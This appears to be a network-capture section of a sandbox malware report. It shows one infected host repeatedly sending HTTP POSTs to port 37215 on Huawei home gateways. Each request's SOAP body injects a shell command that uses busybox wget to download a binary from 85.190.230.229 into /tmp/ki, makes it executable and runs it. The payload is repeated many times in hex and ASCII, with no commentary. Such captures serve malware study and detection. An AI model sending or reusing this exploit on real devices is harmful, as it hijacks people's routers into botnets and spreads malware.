37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.450156927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.442275047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.393996000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425852060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361490011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976913929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951653004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      60192.168.2.1460888197.35.153.11637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.627357960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.970092058 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.482124090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.474023104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 